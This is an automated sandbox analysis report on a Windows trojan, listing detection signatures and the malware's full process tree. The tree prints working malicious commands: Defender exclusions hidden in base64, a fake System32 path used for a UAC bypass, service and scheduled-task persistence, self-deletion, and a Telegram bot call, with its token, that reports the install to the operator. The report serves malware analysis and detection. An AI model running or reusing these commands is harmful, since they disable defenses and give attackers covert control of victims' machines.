Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe
Analysis ID:1549107
MD5:d4e3a11d9468375f793c4c5c2504a374
SHA1:6dc95fc874fcadac1fc135fd521eddbdcb63b1c6
SHA256:0dc03de0ec34caca989f22de1ad61e7bd6bc1eabc6f993dbed2983f4cc33923d
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Sigma detected: TrustedPath UAC Bypass Pattern
Yara detected Powershell decode and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates a Windows Service pointing to an executable in C:\Windows
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Found stalling execution ending in API Sleep call
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Self deletion via cmd or bat file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious command line found
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe (PID: 5772 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe" MD5: D4E3A11D9468375F793C4C5C2504A374)
    • cmd.exe (PID: 5736 cmdline: cmd.exe /c start "" "C:\Users\user\Desktop\curlapp64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • curlapp64.exe (PID: 5680 cmdline: "C:\Users\user\Desktop\curlapp64.exe" MD5: F9830DF1DFDB31CEC5E3BD9F892EDC9A)
        • cmd.exe (PID: 6536 cmdline: cmd.exe /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5676 cmdline: cmd.exe /c start "" "C:\Windows \System32\printui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • printui.exe (PID: 1900 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
            • cmd.exe (PID: 6540 cmdline: cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 6184 cmdline: powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $decoded;" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • curlapp64.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\curlapp64.exe" MD5: F9830DF1DFDB31CEC5E3BD9F892EDC9A)
              • cmd.exe (PID: 5900 cmdline: cmd.exe /c rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 3836 cmdline: cmd.exe /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 3292 cmdline: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • timeout.exe (PID: 5792 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
            • cmd.exe (PID: 1848 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 5340 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 5956 cmdline: cmd.exe /c sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x882081\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x882081.dat" /f && sc start x882081 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • sc.exe (PID: 5240 cmdline: sc create x882081 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
              • reg.exe (PID: 1288 cmdline: reg add HKLM\SYSTEM\CurrentControlSet\services\x882081\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x882081.dat" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
              • sc.exe (PID: 3688 cmdline: sc start x882081 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
            • cmd.exe (PID: 7096 cmdline: cmd.exe /c start "" "C:\Windows\System32\console_zero.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • console_zero.exe (PID: 6308 cmdline: "C:\Windows\System32\console_zero.exe" MD5: 49672519E74E8AD135DAE7345BCEFF41)
                • cmd.exe (PID: 5448 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • schtasks.exe (PID: 4084 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • cmd.exe (PID: 2316 cmdline: cmd.exe /c start "" "C:\Windows\System32\bav64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • bav64.exe (PID: 576 cmdline: "C:\Windows\System32\bav64.exe" MD5: 54EEFA1EAEAB32575A1BDF407327C5DA)
                • cmd.exe (PID: 6392 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 408 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 4836 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 7096 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 5948 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 2200 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Users\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 3304 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 4460 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\ProgramData'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 5908 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 5340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 6408 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files (x86)'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 4148 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 1248 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Program Files'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 5520 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 828 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'C:\Windows\TEMP\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 1476 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 2924 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'colorcpl.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 2104 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'dllhost.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • cmd.exe (PID: 6648 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'notepad.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 3208 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'notepad.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 728 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'regasm.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 2676 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'regasm.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 428 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'RegAsm.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 6368 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'RegAsm.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 5776 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'regsvr32.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 6504 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'regsvr32.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 6308 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'rundll32.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 5720 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'rundll32.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 612 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'sndvol.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 3272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 5460 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'sndvol.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 760 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'wscript.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 6972 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'wscript.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 7084 cmdline: cmd.exe /c powershell -Command "Remove-MpPreference -ExclusionPath 'svchost.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 6592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • powershell.exe (PID: 5652 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'svchost.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 3920 cmdline: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Windows\System32\bav64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • timeout.exe (PID: 3712 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
            • cmd.exe (PID: 6700 cmdline: cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@965969: Installed success.'});" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 3624 cmdline: powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] user@965969: Installed success.'});" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • cmd.exe (PID: 3184 cmdline: cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • timeout.exe (PID: 2928 cmdline: timeout /t 14 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
            • cmd.exe (PID: 5996 cmdline: cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\usvcldr64.dat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • timeout.exe (PID: 4408 cmdline: timeout /t 16 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • cmd.exe (PID: 3144 cmdline: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 6768 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • cmd.exe (PID: 3720 cmdline: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 3376 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • curlapp64.exe (PID: 1892 cmdline: "C:\Users\user\Desktop\curlapp64.exe" MD5: F9830DF1DFDB31CEC5E3BD9F892EDC9A)
    • cmd.exe (PID: 5680 cmdline: cmd.exe /c rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5760 cmdline: cmd.exe /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3116 cmdline: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\curlapp64.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 1960 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • svchost.exe (PID: 1856 cmdline: C:\Windows\System32\svchost.exe -k DcomLaunch MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • cmd.exe (PID: 7064 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2104 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5880 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2576 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 764 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2104 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6820 cmdline: powershell -Command "Remove-MpPreference -ExclusionPath 'dllhost.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 2700 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4292 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
  • console_zero.exe (PID: 2624 cmdline: C:\Windows\System32\console_zero.exe MD5: 49672519E74E8AD135DAE7345BCEFF41)
    • cmd.exe (PID: 2968 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7060 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 6184INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x4f64:$b2: ::FromBase64String(
  • 0x50ab:$b2: ::FromBase64String(
  • 0x53f5:$b2: ::FromBase64String(
  • 0x56f7:$b2: ::FromBase64String(
  • 0x609f:$b2: ::FromBase64String(
  • 0x61e8:$b2: ::FromBase64String(
  • 0x6433:$b2: ::FromBase64String(
  • 0x657d:$b2: ::FromBase64String(
  • 0xd066:$b2: ::FromBase64String(
  • 0xd32a:$b2: ::FromBase64String(
  • 0xb9979:$b2: ::FromBase64String(
  • 0xb9abe:$b2: ::FromBase64String(
  • 0xdef3a:$b2: ::FromBase64String(
  • 0xe6765:$b2: ::FromBase64String(
  • 0x30e135:$b2: ::FromBase64String(
  • 0x30e27a:$b2: ::FromBase64String(
  • 0x31023b:$b2: ::FromBase64String(
  • 0x31536e:$b2: ::FromBase64String(
  • 0x32c99b:$b2: ::FromBase64String(
  • 0x4f43:$b3: ::UTF8.GetString(
  • 0x508a:$b3: ::UTF8.GetString(

Other

SourceRuleDescriptionAuthorStrings
amsi64_6184.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: TrustedPath UAC Bypass Pattern
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows \System32\printui.exe" , CommandLine: "C:\Windows \System32\printui.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\printui.exe, NewProcessName: C:\Windows \System32\printui.exe, OriginalFileName: C:\Windows \System32\printui.exe, ParentCommandLine: cmd.exe /c start "" "C:\Windows \System32\printui.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5676, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows \System32\printui.exe" , ProcessId: 1900, ProcessName: printui.exe
    Sigma detected: Base64 Encoded PowerShell Command Detected
